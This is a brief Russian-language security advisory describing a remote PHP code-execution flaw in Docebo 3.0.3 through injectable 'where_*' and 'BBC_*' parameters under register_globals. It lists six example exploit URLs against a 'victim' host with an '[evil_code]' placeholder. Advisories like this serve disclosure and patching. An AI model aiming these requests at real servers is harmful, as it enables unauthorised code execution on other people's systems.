Программа: Docebo 3.0.3, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметрах "where_framework", "where_cms", "where_lms", "where_scs", "where_upgrade", "BBC_LIB_PATH" и "BBC_LANGUAGE_PATH". Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Удачная эксплуатация уязвимости возможна при включенной опции "register_globals".

Пример:

http://victim/docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=[evil_code]
http://victim/doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=[evil_code]
http://victim/doceboKms/modules/documents/tree.documents.php?GLOBALS[where_framework]=[evil_code]
http://victim/doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=[evil_code]
http://victim/doceboCore/lib/lib.php?GLOBALS[where_framework]=[evil_code]
http://victim/doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=[evil_code]
 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии